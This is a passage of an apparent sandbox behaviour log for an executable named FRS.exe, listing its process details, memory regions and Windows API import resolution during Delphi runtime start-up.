# Flog Txt Version 1 # Analyzer Version: 2.3.0 # Analyzer Build Date: Feb 28 2018 13:48:16 # Log Creation Date: 11.03.2018 10:08:43.188 Process: id = "1" image_name = "frs.exe" filename = "c:\\users\\5jghkoaofdp\\desktop\\frs.exe" page_root = "0x10612000" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" " cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 7 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 8 start_va = 0x400000 end_va = 0x4b3fff entry_point = 0x400000 region_type = mapped_file name = "frs.exe" filename = "\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe") Region: id = 9 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 16 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 154 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 155 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 156 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 157 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 158 start_va = 0x680000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 159 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 160 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 161 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 162 start_va = 0x1b0000 end_va = 0x22dfff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 163 start_va = 0x749c0000 end_va = 0x74a58fff entry_point = 0x749c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 164 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 165 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 166 start_va = 0x748b0000 end_va = 0x748b5fff entry_point = 0x748b0000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 167 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 168 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 169 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 170 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 171 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 172 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 173 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 174 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 175 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 176 start_va = 0x75a50000 end_va = 0x76bfcfff entry_point = 0x75a50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 177 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 178 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 179 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 180 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 181 start_va = 0x940000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 182 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 183 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 184 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 185 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 186 start_va = 0x780000 end_va = 0x900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 187 start_va = 0x950000 end_va = 0x1d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 188 start_va = 0x240000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 189 start_va = 0x748e0000 end_va = 0x749bafff entry_point = 0x748e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 190 start_va = 0x1d50000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 191 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 192 start_va = 0x1d50000 end_va = 0x1e40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d50000" filename = "" Region: id = 193 start_va = 0x1e70000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 194 start_va = 0x390000 end_va = 0x393fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 195 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 196 start_va = 0x74830000 end_va = 0x748a5fff entry_point = 0x74830000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 197 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 198 start_va = 0x1e80000 end_va = 0x2154fff entry_point = 0x1e80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 199 start_va = 0x7fe40000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fe40000" filename = "" Region: id = 200 start_va = 0x7fdd0000 end_va = 0x7fe3ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdd0000" filename = "" Region: id = 201 start_va = 0x7fd80000 end_va = 0x7fdcffff entry_point = 0x0 region_type = private name = "private_0x000000007fd80000" filename = "" Region: id = 202 start_va = 0x7fe60000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Thread: id = 1 os_tid = 0xa4c [0032.862] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74f70000 [0032.863] GetProcAddress (hModule=0x74f70000, lpProcName="VirtualProtect") returned 0x74f8971f [0032.863] VirtualProtect (in: lpAddress=0x40015f, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x18ff6c | out: lpflOldProtect=0x18ff6c*=0x2) returned 1 [0032.863] VirtualProtect (in: lpAddress=0x40015f, dwSize=0x78, flNewProtect=0x2, lpflOldProtect=0x18ff6c | out: lpflOldProtect=0x18ff6c*=0x4) returned 1 [0032.863] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x74d90000 [0032.863] GetProcAddress (hModule=0x74d90000, lpProcName="SysFreeString") returned 0x74d93ddc [0032.863] GetProcAddress (hModule=0x74d90000, lpProcName="SysReAllocStringLen") returned 0x74d98b29 [0032.863] GetProcAddress (hModule=0x74d90000, lpProcName="SysAllocStringLen") returned 0x74d94042 [0032.863] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x74d10000 [0032.863] GetProcAddress (hModule=0x74d10000, lpProcName="RegQueryValueExA") returned 0x74d111a8 [0032.863] GetProcAddress (hModule=0x74d10000, lpProcName="RegOpenKeyExA") returned 0x74d11197 [0032.863] GetProcAddress (hModule=0x74d10000, lpProcName="RegCloseKey") returned 0x74d11164 [0032.863] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75460000 [0032.863] GetProcAddress (hModule=0x75460000, lpProcName="GetKeyboardType") returned 0x754b2379 [0032.863] GetProcAddress (hModule=0x75460000, lpProcName="DestroyWindow") returned 0x749dc030 [0032.863] GetProcAddress (hModule=0x75460000, lpProcName="LoadStringA") returned 0x754841cf [0032.864] GetProcAddress (hModule=0x75460000, lpProcName="MessageBoxA") returned 0x754d279e [0032.864] GetProcAddress (hModule=0x75460000, lpProcName="CharNextA") returned 0x75479fbd [0032.864] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74f70000 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="GetACP") returned 0x74f89864 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="Sleep") returned 0x74f898c0 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="VirtualFree") returned 0x74f837a0 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="VirtualAlloc") returned 0x74f837c0 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="GetTickCount") returned 0x74f9607c [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="QueryPerformanceCounter") returned 0x74f83760 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="GetCurrentThreadId") returned 0x74f81960 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="InterlockedDecrement") returned 0x74f89067 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="InterlockedIncrement") returned 0x74f88f69 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="VirtualQuery") returned 0x74f89a6e [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="WideCharToMultiByte") returned 0x74f87cf2 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="MultiByteToWideChar") returned 0x74f84eb0 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="lstrlenA") returned 0x74f90cf8 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="lstrcpynA") returned 0x74f95aa3 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="LoadLibraryExA") returned 0x74f8bd19 [0032.864] GetProcAddress (hModule=0x74f70000, lpProcName="GetThreadLocale") returned 0x74f8cfec [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetStartupInfoA") returned 0x74f8a47c [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetProcAddress") returned 0x74f8980c [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetModuleHandleA") returned 0x74f8a647 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetModuleFileNameA") returned 0x74f8c329 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetLocaleInfoA") returned 0x74f9460c [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetCommandLineA") returned 0x74f8ce24 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="FreeLibrary") returned 0x74f8bf0a [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="FindFirstFileA") returned 0x74f97398 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="FindClose") returned 0x74f97368 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="ExitProcess") returned 0x74f97f64 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="WriteFile") returned 0x74f975fc [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="UnhandledExceptionFilter") returned 0x74fb3e7f [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="RtlUnwind") returned 0x74f8c83c [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="RaiseException") returned 0x74f8cab0 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="GetStdHandle") returned 0x74f8c433 [0032.865] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74f70000 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="TlsSetValue") returned 0x74f83560 [0032.865] GetProcAddress (hModule=0x74f70000, lpProcName="TlsGetValue") returned 0x74f81940 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="LocalAlloc") returned 0x74f87cd6 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="GetModuleHandleA") returned 0x74f8a647 [0032.866] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75460000 [0032.866] GetProcAddress (hModule=0x75460000, lpProcName="MessageBoxA") returned 0x754d279e [0032.866] GetProcAddress (hModule=0x75460000, lpProcName="LoadStringA") returned 0x754841cf [0032.866] GetProcAddress (hModule=0x75460000, lpProcName="GetSystemMetrics") returned 0x7546b722 [0032.866] GetProcAddress (hModule=0x75460000, lpProcName="CharPrevA") returned 0x754814d6 [0032.866] GetProcAddress (hModule=0x75460000, lpProcName="CharNextA") returned 0x75479fbd [0032.866] GetProcAddress (hModule=0x75460000, lpProcName="CharToOemA") returned 0x754d630d [0032.866] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74f70000 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="WriteFile") returned 0x74f975fc [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="WaitForSingleObject") returned 0x74f972d8 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="VirtualQuery") returned 0x74f89a6e [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="SizeofResource") returned 0x74f8a7d7 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="SetFilePointer") returned 0x74f975b4 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="SetFileAttributesA") returned 0x74f97590 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="SetEvent") returned 0x74f972a8 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="SetEnvironmentVariableA") returned 0x74fb3c89 [0032.866] GetProcAddress (hModule=0x74f70000, lpProcName="SetEndOfFile") returned 0x74f97584 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="ResetEvent") returned 0x74f9729c [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="RemoveDirectoryA") returned 0x74f9756c [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="ReadFile") returned 0x74f97548 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="LockResource") returned 0x74f8994c [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="LoadResource") returned 0x74f898af [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="LeaveCriticalSection") returned 0x770dfd40 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="InitializeCriticalSection") returned 0x770e81f3 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetWindowsDirectoryA") returned 0x74f95be8 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetVersionExA") returned 0x74f89a5d [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetTickCount") returned 0x74f9607c [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetThreadLocale") returned 0x74f8cfec [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetStdHandle") returned 0x74f8c433 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetProcAddress") returned 0x74f8980c [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetModuleHandleA") returned 0x74f8a647 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetModuleFileNameA") returned 0x74f8c329 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetLocaleInfoA") returned 0x74f9460c [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetLocalTime") returned 0x74f8c070 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetLastError") returned 0x74f836c0 [0032.867] GetProcAddress (hModule=0x74f70000, lpProcName="GetFullPathNameA") returned 0x74f974c4 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetFileAttributesA") returned 0x74f97440 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetExitCodeProcess") returned 0x74f95a18 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetEnvironmentVariableA") returned 0x74f8ca8e [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetDiskFreeSpaceA") returned 0x74f973f8 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetDateFormatA") returned 0x74fb31fe [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetCurrentThreadId") returned 0x74f81960 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetCurrentProcessId") returned 0x74f83580 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetCommandLineA") returned 0x74f8ce24 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="GetCPInfo") returned 0x74f8be5c [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="FreeResource") returned 0x74f93eee [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="FreeLibrary") returned 0x74f8bf0a [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="FormatMessageA") returned 0x74f953ee [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="FindResourceA") returned 0x74f8db6a [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="EnumCalendarInfoA") returned 0x74fc6145 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="EnterCriticalSection") returned 0x770dfd00 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="DeleteFileA") returned 0x74f97344 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="DeleteCriticalSection") returned 0x77102974 [0032.868] GetProcAddress (hModule=0x74f70000, lpProcName="CreateProcessA") returned 0x74fb2ecb [0032.869] GetProcAddress (hModule=0x74f70000, lpProcName="CreateFileA") returned 0x74f97320 [0032.869] GetProcAddress (hModule=0x74f70000, lpProcName="CreateEventA") returned 0x74f971b8 [0032.869] GetProcAddress (hModule=0x74f70000, lpProcName="CreateDirectoryA") returned 0x74f972fc [0032.869] GetProcAddress (hModule=0x74f70000, lpProcName="CompareStringA") returned 0x74f8a7f9 [0032.869] GetProcAddress (hModule=0x74f70000, lpProcName="CloseHandle") returned 0x74f9717c [0032.869] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74f70000 [0032.869] GetProcAddress (hModule=0x74f70000, lpProcName="Sleep") returned 0x74f898c0 [0032.869] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x74d90000 [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="SafeArrayPtrOfIndex") returned 0x74d96a3d [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="SafeArrayGetUBound") returned 0x74d95603 [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="SafeArrayGetLBound") returned 0x74d95685 [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="SafeArrayCreate") returned 0x74d95c82 [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="VariantChangeType") returned 0x74d9541e [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="VariantCopy") returned 0x74d94353 [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="VariantClear") returned 0x74d938d5 [0032.869] GetProcAddress (hModule=0x74d90000, lpProcName="VariantInit") returned 0x74d9397a [0032.869] GetModuleHandleA (lpModuleName="SHFolder.dll") returned 0x748b0000 [0032.869] GetProcAddress (hModule=0x748b0000, lpProcName="SHGetFolderPathA") returned 0x748b14fd [0032.869] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0032.873] GetKeyboardType (nTypeFlag=0) returned 4 [0032.880] GetCommandLineA () returned="\"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" " [0032.880] GetStartupInfoA (in: lpStartupInfo=0x18fea8 | out: lpStartupInfo=0x18fea8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.881] GetACP () returned 0x4e4 [0032.881] GetCurrentThreadId () returned 0xa4c [0032.881] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ed98, nSize=0x105 | out: lpFilename="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe")) returned 0x24 [0032.881] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ec73, nSize=0x105 | out: lpFilename="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\frs.exe")) returned 0x24 [0032.881] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18ed88 | out: phkResult=0x18ed88*=0x0) returned 0x2 [0032.881] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18ed88 | out: phkResult=0x18ed88*=0x0) returned 0x2 [0032.881] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18ed88 | out: phkResult=0x18ed88*=0x0) returned 0x2 [0032.881] lstrcpynA (in: lpString1=0x18ec73, lpString2="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe") returned="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe" [0032.881] GetThreadLocale () returned 0x409 [0032.881] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18ed83, cchData=5 | out: lpLCData="ENU") returned 4 [0032.882] lstrlenA (lpString="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe") returned 36 [0032.882] lstrcpynA (in: lpString1=0x18ec94, lpString2="ENU", iMaxLength=228 | out: lpString1="ENU") returned="ENU" [0032.882] LoadLibraryExA (lpLibFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0032.882] lstrcpynA (in: lpString1=0x18ec94, lpString2="EN", iMaxLength=228 | out: lpString1="EN") returned="EN" [0032.882] LoadLibraryExA (lpLibFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0032.882] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0032.882] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18eec8, cchBufferMax=4096 | out: lpBuffer="External exception 